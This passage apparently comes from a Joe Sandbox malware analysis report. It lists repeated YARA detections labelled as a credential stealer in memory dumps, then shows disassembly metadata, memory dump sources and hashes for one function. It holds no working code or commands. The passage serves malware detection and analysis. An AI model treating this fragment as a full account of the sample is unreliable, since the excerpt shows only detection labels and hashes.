                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566394877.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571946572.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566212267.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570969220.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567305786.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1574970043.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1576032432.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566302806.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569167137.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585426357.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566907407.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569362451.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Non-executed Functions

                                                                                  Function 00007FF7137527DC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1386377421.00007FF713701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF713700000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1386354736.00007FF713700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1386430144.00007FF71376A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1386430144.00007FF71416A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1388498516.00007FF7141C4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1388715145.00007FF714307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1388736021.00007FF71430A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1388753682.00007FF714311000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff713700000_PI1EA8P74K.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: ce244896921b2e74160f855e9384b2b9b3893974cbc9c2fcf9eb00448bba2bb9
                                                                                  • Instruction ID: b2281ab6b08f24311fd5b6c8b0e9c8f44e5bf613d765edca16e97f7e54bdf887
                                                                                  • Opcode Fuzzy Hash: ce244896921b2e74160f855e9384b2b9b3893974cbc9c2fcf9eb00448bba2bb9
                                                                                  • Instruction Fuzzy Hash: 07113026B14F018AFB00DF61E8952B873B4F719768F841E35EA6E477A4DF78D1588350